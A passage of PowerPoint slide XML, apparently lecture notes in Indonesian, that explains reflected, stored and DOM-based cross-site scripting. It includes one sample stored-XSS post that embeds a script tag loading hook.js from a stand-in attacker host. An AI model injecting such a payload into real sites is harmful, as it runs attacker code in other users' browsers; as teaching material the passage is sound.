              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipantulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nonpersisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkepanjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyisipkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data back-end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> posting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>papan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buletin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> posting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Check out this amazing &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>="https://trusted. foo"&gt;website&lt;/a&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>="https://badsite.foo/ hook.js"&gt;&lt;/script&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hook.js yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Skrip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Document Object Model (DOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
